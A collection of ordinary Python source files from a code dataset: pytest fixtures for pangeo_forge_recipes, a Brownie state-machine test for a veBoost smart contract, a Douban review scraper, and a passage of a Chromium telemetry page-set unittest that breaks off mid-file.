+{"seq_id":"465702747","text":"import logging\nimport os\nimport socket\nimport subprocess\nimport time\n\nimport fsspec\nimport numpy as np\nimport pandas as pd\nimport pytest\nimport xarray as xr\nfrom dask.distributed import Client, LocalCluster\nfrom prefect.executors import DaskExecutor\n\nfrom pangeo_forge_recipes import recipes\nfrom pangeo_forge_recipes.executors import (\n DaskPipelineExecutor,\n PrefectPipelineExecutor,\n PythonPipelineExecutor,\n)\nfrom pangeo_forge_recipes.patterns import (\n ConcatDim,\n FilePattern,\n MergeDim,\n pattern_from_file_sequence,\n)\nfrom pangeo_forge_recipes.storage import CacheFSSpecTarget, FSSpecTarget, MetadataTarget\n\n\n# to use this feature, e.g.\n# $ pytest --redirect-dask-worker-logs-to-stdout=DEBUG\ndef pytest_addoption(parser):\n parser.addoption(\n \"--redirect-dask-worker-logs-to-stdout\", action=\"store\", default=\"NOTSET\",\n )\n\n\ndef get_open_port():\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.bind((\"\", 0))\n s.listen(1)\n port = str(s.getsockname()[1])\n s.close()\n return port\n\n\n@pytest.fixture(scope=\"session\")\ndef daily_xarray_dataset():\n \"\"\"Return a synthetic random xarray dataset.\"\"\"\n np.random.seed(1)\n # TODO: change nt to 11 in order to catch the edge case where\n # items_per_input does not evenly divide the length of the sequence dimension\n nt, ny, nx = 10, 18, 36\n time = pd.date_range(start=\"2010-01-01\", periods=nt, freq=\"D\")\n lon = (np.arange(nx) + 0.5) * 360 / nx\n lon_attrs = {\"units\": \"degrees_east\", \"long_name\": \"longitude\"}\n lat = (np.arange(ny) + 0.5) * 180 / ny\n lat_attrs = {\"units\": \"degrees_north\", \"long_name\": \"latitude\"}\n foo = np.random.rand(nt, ny, nx)\n foo_attrs = {\"long_name\": \"Fantastic Foo\"}\n # make sure things work with heterogenous data types\n bar = np.random.randint(0, 10, size=(nt, ny, nx))\n bar_attrs = {\"long_name\": \"Beautiful Bar\"}\n dims = (\"time\", \"lat\", \"lon\")\n ds = xr.Dataset(\n {\"bar\": (dims, bar, bar_attrs), \"foo\": (dims, foo, foo_attrs)},\n coords={\n \"time\": (\"time\", time),\n \"lat\": (\"lat\", lat, lat_attrs),\n \"lon\": (\"lon\", lon, lon_attrs),\n },\n attrs={\"conventions\": \"CF 1.6\"},\n )\n return ds\n\n\ndef _split_up_files_by_day(ds, day_param):\n gb = ds.resample(time=day_param)\n _, datasets = zip(*gb)\n fnames = [f\"{n:03d}.nc\" for n in range(len(datasets))]\n return datasets, fnames\n\n\ndef _split_up_files_by_variable_and_day(ds, day_param):\n all_dsets = []\n all_fnames = []\n fnames_by_variable = {}\n for varname in ds.data_vars:\n var_dsets, fnames = _split_up_files_by_day(ds[[varname]], day_param)\n fnames = [f\"{varname}_{fname}\" for fname in fnames]\n all_dsets += var_dsets\n all_fnames += fnames\n fnames_by_variable[varname] = fnames\n return all_dsets, all_fnames, fnames_by_variable\n\n\n@pytest.fixture(scope=\"session\", params=[\"D\", \"2D\"])\ndef netcdf_local_paths(daily_xarray_dataset, tmpdir_factory, request):\n \"\"\"Return a list of paths pointing to netcdf files.\"\"\"\n tmp_path = tmpdir_factory.mktemp(\"netcdf_data\")\n # copy needed to avoid polluting metadata across multiple tests\n datasets, fnames = _split_up_files_by_day(daily_xarray_dataset.copy(), request.param)\n full_paths = [tmp_path.join(fname) for fname in fnames]\n xr.save_mfdataset(datasets, [str(path) for path in full_paths])\n items_per_file = {\"D\": 1, \"2D\": 2}[request.param]\n return full_paths, items_per_file\n\n\n# TODO: this is quite repetetive of the fixture above. Replace with parametrization.\n@pytest.fixture(scope=\"session\", params=[\"D\", \"2D\"])\ndef netcdf_local_paths_by_variable(daily_xarray_dataset, tmpdir_factory, request):\n \"\"\"Return a list of paths pointing to netcdf files.\"\"\"\n tmp_path = tmpdir_factory.mktemp(\"netcdf_data\")\n datasets, fnames, fnames_by_variable = _split_up_files_by_variable_and_day(\n daily_xarray_dataset.copy(), request.param\n )\n full_paths = [tmp_path.join(fname) for fname in fnames]\n xr.save_mfdataset(datasets, [str(path) for path in full_paths])\n items_per_file = {\"D\": 1, \"2D\": 2}[request.param]\n path_format = str(tmp_path) + \"/{variable}_{time:03d}.nc\"\n return full_paths, items_per_file, fnames_by_variable, path_format\n\n\n# TODO: refactor to allow netcdf_local_paths_by_variable to be passed without\n# duplicating the whole test.\n@pytest.fixture(scope=\"session\")\ndef netcdf_http_paths(netcdf_local_paths, request):\n paths, items_per_file = netcdf_local_paths\n\n username = \"\"\n password = \"\"\n\n first_path = paths[0]\n # assume that all files are in the same directory\n basedir = first_path.dirpath()\n fnames = [path.basename for path in paths]\n\n this_dir = os.path.dirname(os.path.abspath(__file__))\n port = get_open_port()\n command_list = [\n \"python\",\n os.path.join(this_dir, \"http_auth_server.py\"),\n port,\n \"127.0.0.1\",\n username,\n password,\n ]\n if username:\n command_list += [username, password]\n p = subprocess.Popen(command_list, cwd=basedir)\n url = f\"http://127.0.0.1:{port}\"\n time.sleep(2) # let the server start up\n\n def teardown():\n p.kill()\n\n request.addfinalizer(teardown)\n\n all_urls = [\"/\".join([url, str(fname)]) for fname in fnames]\n return all_urls, items_per_file\n\n\n@pytest.fixture()\ndef tmp_target(tmpdir_factory):\n fs = fsspec.get_filesystem_class(\"file\")()\n path = str(tmpdir_factory.mktemp(\"target\"))\n return FSSpecTarget(fs, path)\n\n\n@pytest.fixture()\ndef tmp_cache(tmpdir_factory):\n path = str(tmpdir_factory.mktemp(\"cache\"))\n fs = fsspec.get_filesystem_class(\"file\")()\n cache = CacheFSSpecTarget(fs, path)\n return cache\n\n\n@pytest.fixture()\ndef tmp_metadata_target(tmpdir_factory):\n path = str(tmpdir_factory.mktemp(\"cache\"))\n fs = fsspec.get_filesystem_class(\"file\")()\n cache = MetadataTarget(fs, path)\n return cache\n\n\n@pytest.fixture\ndef netCDFtoZarr_sequential_recipe(\n daily_xarray_dataset, netcdf_local_paths, tmp_target, tmp_cache, tmp_metadata_target\n):\n paths, items_per_file = netcdf_local_paths\n file_pattern = pattern_from_file_sequence([str(path) for path in paths], \"time\", items_per_file)\n kwargs = dict(\n inputs_per_chunk=1,\n target=tmp_target,\n input_cache=tmp_cache,\n metadata_cache=tmp_metadata_target,\n )\n return recipes.XarrayZarrRecipe, file_pattern, kwargs, daily_xarray_dataset, tmp_target\n\n\n@pytest.fixture\ndef netCDFtoZarr_sequential_subset_recipe(\n daily_xarray_dataset, netcdf_local_paths, tmp_target, tmp_cache, tmp_metadata_target\n):\n paths, items_per_file = netcdf_local_paths\n if items_per_file != 2:\n pytest.skip(\"This recipe only makes sense with items_per_file == 2.\")\n file_pattern = pattern_from_file_sequence([str(path) for path in paths], \"time\", items_per_file)\n kwargs = dict(\n subset_inputs={\"time\": 2},\n inputs_per_chunk=1,\n target=tmp_target,\n input_cache=tmp_cache,\n metadata_cache=tmp_metadata_target,\n )\n return recipes.XarrayZarrRecipe, file_pattern, kwargs, daily_xarray_dataset, tmp_target\n\n\n@pytest.fixture\ndef netCDFtoZarr_sequential_multi_variable_recipe(\n daily_xarray_dataset, netcdf_local_paths_by_variable, tmp_target, tmp_cache, tmp_metadata_target\n):\n paths, items_per_file, fnames_by_variable, path_format = netcdf_local_paths_by_variable\n time_index = list(range(len(paths) // 2))\n\n def format_function(variable, time):\n return path_format.format(variable=variable, time=time)\n\n file_pattern = FilePattern(\n format_function,\n ConcatDim(\"time\", time_index, items_per_file),\n MergeDim(\"variable\", [\"foo\", \"bar\"]),\n )\n kwargs = dict(\n inputs_per_chunk=1,\n target=tmp_target,\n input_cache=tmp_cache,\n metadata_cache=tmp_metadata_target,\n )\n return recipes.XarrayZarrRecipe, file_pattern, kwargs, daily_xarray_dataset, tmp_target\n\n\n@pytest.fixture(scope=\"session\")\ndef dask_cluster(request):\n cluster = LocalCluster(n_workers=2, threads_per_worker=1, silence_logs=False)\n\n client = Client(cluster)\n\n # cluster setup\n\n def set_blosc_threads():\n from numcodecs import blosc\n\n blosc.use_threads = False\n\n log_level_name = request.config.getoption(\"--redirect-dask-worker-logs-to-stdout\")\n level = logging.getLevelName(log_level_name)\n\n def redirect_logs():\n import logging\n\n for log in [\"pangeo_forge_recipes\", \"fsspec\"]:\n logger = logging.getLogger(log)\n formatter = logging.Formatter(\"%(name)s - %(levelname)s - %(message)s\")\n handler = logging.StreamHandler()\n handler.setFormatter(formatter)\n handler.setLevel(level)\n logger.setLevel(level)\n logger.addHandler(handler)\n\n client.run(set_blosc_threads)\n client.run(redirect_logs)\n client.close()\n del client\n\n yield cluster\n\n cluster.close()\n\n\n_executors = {\n \"python\": PythonPipelineExecutor,\n \"dask\": DaskPipelineExecutor,\n \"prefect\": PrefectPipelineExecutor,\n \"prefect-dask\": PrefectPipelineExecutor,\n}\n\n\n@pytest.fixture(params=[\"manual\", \"python\", \"dask\", \"prefect\", \"prefect-dask\"])\ndef execute_recipe(request, dask_cluster):\n if request.param == \"manual\":\n\n def execute(r):\n if r.cache_inputs:\n for input_key in r.iter_inputs():\n r.cache_input(input_key)\n r.prepare_target()\n for chunk_key in r.iter_chunks():\n r.store_chunk(chunk_key)\n r.finalize_target()\n\n elif request.param == \"python\":\n\n def execute(recipe):\n return recipe.to_function()()\n\n elif request.param == \"dask\":\n\n def execute(recipe):\n with Client(dask_cluster):\n return recipe.to_dask().compute()\n\n elif request.param == \"prefect\":\n\n def execute(recipe):\n state = recipe.to_prefect().run()\n if state.is_failed():\n raise ValueError(f\"Prefect flow run failed with message {state.message}\")\n\n else:\n assert request.param == \"prefect-dask\"\n\n def execute(recipe):\n flow = recipe.to_prefect()\n executor = DaskExecutor(address=dask_cluster.scheduler_address)\n state = flow.run(executor=executor)\n if state.is_failed():\n raise ValueError(f\"Prefect flow run failed with message {state.message}\")\n\n execute.param = request.param\n return execute\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":10570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"443785293","text":"import math\nfrom collections import defaultdict\nfrom typing import DefaultDict\n\nimport brownie\nfrom brownie import ZERO_ADDRESS, chain, convert\nfrom brownie.network.account import Account, Accounts\nfrom brownie.network.contract import Contract\nfrom brownie.test import strategy\nfrom dataclassy import dataclass\n\nDAY = 86400\nWEEK = DAY * 7\nYEAR = DAY * 365\n\n\n@dataclass(slots=True, iter=True)\nclass Point:\n \"\"\"Representation of a point on a 2-D plane.\n\n Examples:\n\n >>> Point(0, 0)\n Point(x=0, y=0)\n >>> Point(0, 0) + Point(0, 1)\n Point(x=0, y=1)\n >>> Point(0, 1) - Point(0, 1)\n Point(x=0, y=0)\n >>> Point(1, 2) * 3\n Point(x=3, y=6)\n \"\"\"\n\n x: int\n y: int\n\n def __add__(self, other: \"Point\") -> \"Point\":\n return Point(self.x + other.x, self.y + other.y)\n\n def __sub__(self, other: \"Point\") -> \"Point\":\n return Point(self.x - other.x, self.y - other.y)\n\n def __mul__(self, other: int) -> \"Point\":\n assert isinstance(other, int)\n return Point(self.x * other, self.y * other)\n\n\n@dataclass(slots=True, iter=True)\nclass Line:\n \"\"\"Reperesentation of a line on a 2-D plane.\n\n Examples:\n\n >>> Line(0, 0)\n Line(slope=0, bias=0)\n >>> Line(0, 1) + Line(1, 1)\n Line(slope=1, bias=2)\n >>> Line(1, 1) - Line(1, 0)\n Line(slope=0, bias=1)\n >>> Line(1, 1) * 3\n Line(slope=3, bias=3)\n >>> list(Line(0, 1))\n [0, 1]\n >>> Line.from_two_points((0, 0), (1, 1))\n Line(slope=1, bias=0)\n \"\"\"\n\n slope: int = 0\n bias: int = 0\n\n @classmethod\n def from_two_points(cls, a: Point, b: Point) -> \"Line\":\n \"\"\"Generate a line which fits through two points.\n\n Uses integer division for calculating slope, similar to the EVM\n implementation of veBoost.\n \"\"\"\n (x1, y1), (x2, y2) = a, b\n slope = (y2 - y1) // (x2 - x1)\n bias = y1 - slope * x1\n return cls(slope, bias)\n\n def __add__(self, other: \"Line\") -> \"Line\":\n return Line(self.slope + other.slope, self.bias + other.bias)\n\n def __sub__(self, other: \"Line\") -> \"Line\":\n return Line(self.slope - other.slope, self.bias - other.bias)\n\n def __mul__(self, other: int) -> \"Line\":\n assert isinstance(other, int)\n return Line(self.slope * other, self.bias * other)\n\n def __call__(self, x: int) -> int:\n return self.slope * x + self.bias\n\n\nclass Token(Line):\n \"\"\"Representation of a Token's data fields.\n\n Examples:\n\n >>> Token()\n Token(slope=0, bias=0, delegator=None, owner=None, cancel_time=0)\n >>> Token(1, 1)\n Token(slope=1, bias=1, delegator=None, owner=None, cancel_time=0)\n >>> Token(1, 1) + Token(10, 0)\n Token(slope=11, bias=1, delegator=None, owner=None, cancel_time=0)\n >>> Token(1, 1) - Token(1, 0)\n Token(slope=0, bias=1, delegator=None, owner=None, cancel_time=0)\n >>> Token(1, 1, 'someone', 'someone_else', 30) * 0\n Token(slope=0, bias=0, delegator='someone', owner='someone_else', cancel_time=30)\n >>> list(Token(0, 1))\n [0, 1, None, None, 0]\n >>> Token.from_two_points((0, 0), (1, 1))\n Token(slope=1, bias=0, delegator=None, owner=None, cancel_time=0)\n \"\"\"\n\n delegator: Account = None\n owner: Account = None\n cancel_time: int = 0\n\n @classmethod\n def from_two_points(cls, a: Point, b: Point) -> \"Line\":\n return cls(*super().from_two_points(a, b))\n\n @property\n def expire_time(self):\n if self.slope == 0:\n return 0\n else:\n return -self.bias // self.slope\n\n def __add__(self, other: \"Token\") -> \"Token\":\n return Token(*super().__add__(other), *(list(self)[2:]))\n\n def __sub__(self, other: \"Token\") -> \"Token\":\n return Token(*super().__sub__(other), *(list(self)[2:]))\n\n def __mul__(self, other: int) -> \"Token\":\n assert isinstance(other, int)\n return Token(*super().__mul__(other), *(list(self)[2:]))\n\n def __call__(self, x: int) -> int:\n return super().__call__(x)\n\n\n@dataclass(slots=True, iter=True)\nclass Boost:\n\n delegated: Line = Line(0, 0)\n received: Line = Line(0, 0)\n\n\nclass ContractState:\n def __init__(self) -> None:\n\n self.boost: DefaultDict[Account, Boost] = defaultdict(Boost)\n self.boost_tokens: DefaultDict[int, Token] = defaultdict(Token)\n\n def create_boost(\n self,\n delegator: Account,\n receiver: Account,\n percentage: int,\n cancel_time: int,\n expire_time: int,\n _id: int,\n timestamp: int,\n vecrv_balance: int,\n lock_expiry: int,\n update_state: bool = False,\n ):\n assert 0 < percentage < 10_000 # percentage within bounds\n # cancel time before expire time, expire time before lock expiry\n assert cancel_time <= expire_time <= lock_expiry\n assert expire_time >= timestamp + WEEK # expire time greater than min delegation time\n assert _id < 2 ** 96 # id with bounds\n\n assert all(\n [t(timestamp) >= 0 for t in self.boost_tokens.values() if t.delegator == delegator]\n )\n\n delegated_boost: int = self.boost[delegator].delegated(timestamp)\n y = percentage * (vecrv_balance - delegated_boost) // 10_000\n assert y > 0\n\n token: Token = Token.from_two_points((timestamp, y), (expire_time, 0))\n assert token.slope < 0\n\n token.delegator = delegator\n token.owner = receiver\n token.cancel_time = cancel_time\n\n token_id: int = self.get_token_id(delegator.address, _id)\n assert self.boost_tokens[token_id].owner is None\n\n # modify state last\n if update_state:\n self.boost_tokens[token_id] = token\n self.boost[delegator].delegated += token\n self.boost[receiver].received += token\n\n def extend_boost(\n self,\n token_id: int,\n percentage: int,\n expire_time: int,\n cancel_time: int,\n timestamp: int,\n vecrv_balance: int,\n lock_expiry: int,\n update_state: bool = False,\n ):\n assert 0 < percentage <= 10_000\n assert cancel_time <= expire_time <= lock_expiry\n assert expire_time >= timestamp + WEEK\n\n token: Token = self.boost_tokens[token_id]\n assert token.owner is not None\n\n token_current_value: int = token(timestamp)\n token_expiry: int = token.expire_time\n\n assert expire_time >= token_expiry\n if cancel_time < token.cancel_time:\n assert timestamp >= token_expiry\n\n assert all(\n [\n t(timestamp) >= 0\n for t in self.boost_tokens.values()\n if t.delegator == token.delegator and t != token\n ]\n )\n\n delegated_boost: int = (self.boost[token.delegator].delegated - token)(timestamp)\n y: int = percentage * (vecrv_balance - delegated_boost) // 10_000\n assert y > 0\n assert y >= token_current_value\n\n new_token: Token = Token.from_two_points((timestamp, y), (expire_time, 0))\n assert new_token.slope < 0\n\n new_token.delegator = token.delegator\n new_token.owner = token.owner\n new_token.cancel_time = cancel_time\n\n # modify state last\n if update_state:\n self.boost_tokens[token_id] = new_token\n self.boost[token.delegator].delegated -= token\n self.boost[token.delegator].delegated += new_token\n self.boost[token.owner].received -= token\n self.boost[token.owner].received += new_token\n\n def cancel_boost(\n self, token_id: int, caller: Account, timestamp: int, update_state: bool = False\n ):\n token: Token = self.boost_tokens[token_id]\n assert token.owner is not None\n if not (caller == token.owner or token(timestamp) <= 0):\n if caller == token.delegator:\n assert timestamp >= token.cancel_time\n else:\n assert False\n\n if update_state:\n self.boost[token.delegator].delegated -= token\n self.boost[token.owner].received -= token\n self.boost_tokens[token_id] *= 0\n self.boost_tokens[token_id].cancel_time = 0\n\n def transfer_from(\n self,\n _from: Account,\n _to: Account,\n token_id: int,\n timestamp: int,\n update_state: bool = False,\n ):\n assert self.boost_tokens[token_id].owner == _from\n assert _to != ZERO_ADDRESS\n\n token: Token = self.boost_tokens[token_id]\n value: int = token(timestamp)\n\n if update_state:\n if value > 0:\n self.boost[_from].received -= token\n self.boost[_to].received += token\n self.boost_tokens[token_id].owner = _to\n else:\n self.boost[token.delegator].delegated -= token\n self.boost[_from].received -= token\n self.boost_tokens[token_id].slope = 0\n self.boost_tokens[token_id].bias = 0\n self.boost_tokens[token_id].owner = _to\n\n def adjusted_balance_of(self, account: Account, timestamp: int, vecrv_balance: int) -> int:\n if any(\n [\n token(timestamp) < 0\n for token in self.boost_tokens.values()\n if token.delegator == account\n ]\n ):\n return 0\n\n delegated = self.boost[account].delegated(timestamp)\n received = self.boost[account].received(timestamp)\n balance = vecrv_balance - abs(delegated) + max(received, 0)\n return max(balance, 0)\n\n @staticmethod\n def get_token_id(account: str, _id: int) -> int:\n return (convert.to_uint(account) << 96) + _id\n\n @staticmethod\n def round_to_nearest_week(time: int) -> int:\n return (time // WEEK) * WEEK\n\n\nclass StateMachine:\n\n account = strategy(\"address\")\n timedelta = strategy(\"uint32\", min_value=WEEK - DAY, max_value=2 * YEAR)\n pct = strategy(\"int16\", min_value=-1, max_value=10_001)\n\n def __init__(\n cls, accounts: Accounts, crv: Contract, vecrv: Contract, veboost: Contract\n ) -> None:\n cls.accounts = accounts\n cls.crv = crv\n cls.vecrv = vecrv\n cls.veboost = veboost\n\n # available throughout all the test runs\n brownie.multicall.deploy({\"from\": accounts[0]})\n\n def setup(self) -> None:\n self.state = ContractState()\n self.delegator_ids = defaultdict(set)\n\n total_supply = self.crv.balanceOf(self.accounts[0])\n amount = total_supply // len(self.accounts)\n for account in self.accounts:\n self.crv.transfer(account, amount, {\"from\": self.accounts[0]})\n self.crv.approve(self.vecrv, 2 ** 256 - 1, {\"from\": account})\n # lock up half of each accounts balance for 3 years\n self.vecrv.create_lock(amount, chain.time() + 3 * YEAR, {\"from\": account})\n\n def rule_create_boost(\n self,\n percentage: int = \"pct\",\n expire_time: int = \"timedelta\",\n delegator: Account = \"account\",\n receiver: Account = \"account\",\n ):\n with brownie.multicall(block_identifier=chain.height):\n vecrv_balance = self.vecrv.balanceOf(delegator)\n lock_expiry = self.vecrv.locked__end(delegator)\n\n _id = (set(range(10000)) - self.delegator_ids[delegator]).pop()\n self.delegator_ids[delegator].add(_id)\n time = self.state.round_to_nearest_week(int(expire_time + chain.time()))\n try:\n self.state.create_boost(\n delegator,\n receiver,\n percentage,\n time,\n time,\n _id,\n int(chain.time()),\n vecrv_balance,\n lock_expiry,\n )\n except AssertionError:\n with brownie.reverts():\n self.veboost.create_boost(\n delegator,\n receiver,\n percentage,\n time,\n time,\n _id,\n {\"from\": delegator},\n )\n else:\n tx = self.veboost.create_boost(\n delegator,\n receiver,\n percentage,\n time,\n time,\n _id,\n {\"from\": delegator},\n )\n with brownie.multicall(block_identifier=tx.block_number):\n vecrv_balance = self.vecrv.balanceOf(delegator)\n lock_expiry = self.vecrv.locked__end(delegator)\n self.state.create_boost(\n delegator,\n receiver,\n percentage,\n time,\n time,\n _id,\n tx.timestamp,\n vecrv_balance,\n lock_expiry,\n True,\n )\n\n def rule_extend_boost(\n self,\n pct: int,\n expire_time=\"timedelta\",\n ):\n if not self.delegator_ids:\n return\n delegator = list(self.delegator_ids.keys()).pop()\n if not self.delegator_ids[delegator]:\n return\n _id = self.delegator_ids[delegator].pop()\n token_id = self.state.get_token_id(delegator.address, _id)\n\n time = self.state.round_to_nearest_week(int(expire_time + chain.time()))\n with brownie.multicall(block_identifier=chain.height):\n vecrv_balance = self.vecrv.balanceOf(delegator)\n lock_expiry = self.vecrv.locked__end(delegator)\n\n try:\n self.state.extend_boost(\n token_id,\n pct,\n time,\n time,\n int(chain.time()),\n vecrv_balance,\n lock_expiry,\n )\n except AssertionError:\n with brownie.reverts():\n self.veboost.extend_boost(\n token_id,\n pct,\n time,\n time,\n {\"from\": self.state.boost_tokens[token_id].delegator or self.accounts[0]},\n )\n else:\n tx = self.veboost.extend_boost(\n token_id,\n pct,\n time,\n time,\n {\"from\": self.state.boost_tokens[token_id].delegator},\n )\n with brownie.multicall(block_identifier=tx.block_number):\n vecrv_balance = self.vecrv.balanceOf(delegator)\n lock_expiry = self.vecrv.locked__end(delegator)\n\n self.state.extend_boost(\n token_id,\n pct,\n time,\n time,\n tx.timestamp,\n vecrv_balance,\n lock_expiry,\n True,\n )\n\n def rule_transfer_boost(self, _to: Account = \"account\"):\n available_tokens = list(self.state.boost_tokens.keys())\n if not available_tokens:\n return\n token_id = available_tokens.pop()\n _from = self.state.boost_tokens[token_id].owner or self.accounts[0]\n\n try:\n self.state.transfer_from(_from, _to, token_id, chain.time())\n except AssertionError:\n with brownie.reverts():\n self.veboost.transferFrom(_from, _to, token_id, {\"from\": _from})\n else:\n tx = self.veboost.transferFrom(_from, _to, token_id, {\"from\": _from})\n self.state.transfer_from(_from, _to, token_id, tx.timestamp, True)\n\n def rule_cancel_boost(self, caller: Account = \"account\"):\n available_tokens = list(self.state.boost_tokens.keys())\n if not available_tokens:\n return\n token_id = available_tokens.pop()\n\n if self.state.boost_tokens[token_id].owner is None:\n assert self.veboost.ownerOf(token_id) == ZERO_ADDRESS\n return\n\n try:\n self.state.cancel_boost(token_id, caller, chain.time())\n except AssertionError:\n with brownie.reverts():\n self.veboost.cancel_boost(token_id, {\"from\": caller})\n else:\n tx = self.veboost.cancel_boost(token_id, {\"from\": caller})\n self.state.cancel_boost(token_id, caller, tx.timestamp, True)\n\n def rule_advance_time(self, timedelta):\n chain.mine(timedelta=timedelta)\n\n def invariant_adjusted_balance(self):\n for account in self.accounts:\n with brownie.multicall(block_identifier=chain.height):\n vecrv_balance = self.vecrv.balanceOf(account)\n timestamp = brownie.multicall._contract.getCurrentBlockTimestamp()\n adj_balance = self.veboost.adjusted_balance_of(account)\n\n assert math.isclose(\n adj_balance,\n self.state.adjusted_balance_of(account, timestamp, vecrv_balance),\n rel_tol=0.0001,\n abs_tol=100_000,\n )\n\n\ndef test_boost_state(state_machine, accounts, crv, vecrv, veboost):\n state_machine(\n StateMachine,\n accounts,\n crv,\n vecrv,\n veboost,\n settings={\"stateful_step_count\": 25},\n )\n","sub_path":"tests/boosts/test_state.py","file_name":"test_state.py","file_ext":"py","file_size_in_byte":17312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"258175926","text":"from .config import settings\nimport requests\nfrom bs4 import BeautifulSoup\n\nclass DouBan:\n\n def __init__(self, keywords):\n self.keywords = keywords\n\n def fetch(self):\n url = settings.DOUBAN_SEARCH + self.keywords\n try:\n response = requests.get(url, headers=settings.CRAWLER_HEADERS)\n if response.status_code == 200:\n response.encoding = 'utf-8'\n detail_url = self.parse_link(response.text)\n spoiler_text = self.fetch_detail(detail_url)\n return spoiler_text\n else:\n return None\n except Exception as e:\n print(e)\n\n def parse_link(self, content):\n soup = BeautifulSoup(content, settings.PARSER)\n a_tag = soup.find_all('h3')[0].a\n return a_tag['href']\n\n def fetch_detail(self, url):\n try:\n response = requests.get(url, headers=settings.CRAWLER_HEADERS)\n if response.status_code == 200:\n soup = BeautifulSoup(response.text, settings.PARSER)\n init_short_comment_seq = soup.find_all('span', attrs={'class': 'short'})\n short_comment_seq = [s.string for s in init_short_comment_seq]\n return ''.join(short_comment_seq)\n else:\n return None\n except Exception as e:\n print(e)","sub_path":"crawler/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"625042470","text":"# Copyright (c) 2012 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\nimport os\nimport tempfile\nimport unittest\n\nfrom telemetry.core import util\nfrom telemetry.page import page_set\n\n\nsimple_archive_info = \"\"\"\n{\n\"archives\": {\n \"data_01.wpr\": [\"http://www.foo.com/\"],\n \"data_02.wpr\": [\"http://www.bar.com/\"]\n}\n}\n\"\"\"\n\n\nsimple_set = \"\"\"\n{\"description\": \"hello\",\n \"archive_data_file\": \"%s\",\n \"pages\": [\n {\"url\": \"http://www.foo.com/\"},\n {\"url\": \"http://www.bar.com/\"}\n ]\n}\n\"\"\"\n\n\nclass TestPageSet(unittest.TestCase):\n def testSimpleSet(self):\n try:\n with tempfile.NamedTemporaryFile(delete=False, suffix=\".json\") as f:\n f.write(simple_archive_info)\n\n with tempfile.NamedTemporaryFile(delete=False, suffix=\".json\") as f2:\n f2.write(simple_set % f.name.replace('\\\\', '\\\\\\\\'))\n\n ps = page_set.PageSet.FromFile(f2.name)\n finally:\n os.remove(f.name)\n os.remove(f2.name)\n\n self.assertEquals('hello', ps.description)\n self.assertEquals(f.name, ps.archive_data_file)\n self.assertEquals(2, len(ps.pages))\n self.assertEquals('http://www.foo.com/', ps.pages[0].url)\n self.assertEquals('http://www.bar.com/', ps.pages[1].url)\n self.assertEquals('data_01.wpr', os.path.basename(ps.pages[0].archive_path))\n self.assertEquals('data_02.wpr', os.path.basename(ps.pages[1].archive_path))\n\n def testServingDirs(self):\n directory_path = tempfile.mkdtemp()\n try:\n ps = page_set.PageSet.FromDict({\n 'serving_dirs': ['a/b'],\n 'pages': [\n {'url': 'file://c/test.html'},\n {'url': 'file://c/test.js'},\n {'url': 'file://d/e/../test.html'},\n ]\n }, directory_path)\n finally:\n os.rmdir(directory_path)\n\n real_directory_path = os.path.realpath(directory_path)\n expected_serving_dirs = set([os.path.join(real_directory_path, 'a', 'b')])\n self.assertEquals(ps.serving_dirs, expected_serving_dirs)\n self.assertEquals(ps[0].serving_dir, os.path.join(real_directory_path, 'c'))\n self.assertEquals(ps[2].serving_dir, os.path.join(real_directory_path, 'd'))\n\n def testRenamingCompoundActions(self):\n ps = page_set.PageSet.FromDict({\n 'serving_dirs': ['a/b'],\n 'smoothness' : { 'action' : 'scroll' },\n 'pages': [\n {'url': 'http://www.foo.com',\n 'stress_memory': {'action': 'javasciprt'}\n },\n {'url': 'http://www.bar.com',\n 'navigate_steps': {'action': 'navigate2'},\n 'repaint' : {'action': 'scroll'}\n },\n ]}, 'file://foo.js')\n\n self.assertTrue(hasattr(ps.pages[0], 'RunNavigateSteps'))\n self.assertEquals(ps.pages[0].RunSmoothness, {'action': 'scroll'})\n self.assertEquals(ps.pages[0].RunStressMemory, {'action': 'javasciprt'})\n\n self.assertEquals(ps.pages[1].RunSmoothness, {'action': 'scroll'})\n self.assertEquals(ps.pages[1].RunNavigateSteps, {'action': 'navigate2'})\n self.assertEquals(ps.pages[1].RunRepaint, {'action': 'scroll'})\n\n def testRunNavigateStepsInheritance(self):\n ps = page_set.PageSet.FromDict({\n 'serving_dirs': ['a/b'],\n 'navigate_steps' : { 'action' : 'navigate1' },\n 'pages': [\n {'url': 'http://www.foo.com',\n },\n {'url': 'http://www.bar.com',\n 'navigate_steps': {'action': 'navigate2'},\n },\n ]}, 'file://foo.js')\n\n self.assertEquals(ps.pages[0].RunNavigateSteps, {'action': 'navigate1'})\n self.assertEquals(ps.pages[1].RunNavigateSteps, {'action': 'navigate2'})\n\n\n def testSuccesfulPythonPageSetLoading(self):\n test_pps_dir = os.path.join(util.GetUnittestDataDir(), 'test_page_set.py')\n pps = page_set.PageSet.FromFile(test_pps_dir)\n self.assertEqual('TestPageSet', pps.__class__.__name__)\n self.assertEqual('A pageset for testing purpose', pps.description)\n self.assertEqual('data/test.json', pps.archive_data_file)\n self.assertEqual('data/credential', pps.credentials_path)\n self.assertEqual('desktop', pps.user_agent_type)\n self.assertEqual(test_pps_dir, pps.file_path)\n self.assertEqual(1, len(pps.pages))\n google_page = pps.pages[0]\n self.assertEqual('https://www.google.com', google_page.url)\n self.assertIs(pps, google_page.page_set)\n self.assertTrue(hasattr(google_page, 'RunNavigateSteps'))\n self.assertTrue(5, google_page.RunGetActionRunner(action_runner=5))\n\n def testMultiplePythonPageSetsLoading(self):\n test_pps_1_dir = os.path.join(util.GetUnittestDataDir(),\n 'test_simple_one_page_set.py')\n test_pps_2_dir = os.path.join(util.GetUnittestDataDir(),\n 'test_simple_two_page_set.py')\n pps1 = page_set.PageSet.FromFile(test_pps_1_dir)\n pps2 = page_set.PageSet.FromFile(test_pps_2_dir)\n\n self.assertEqual('TestSimpleOnePageSet', pps1.__class__.__name__)\n self.assertEqual('TestSimpleTwoPageSet', 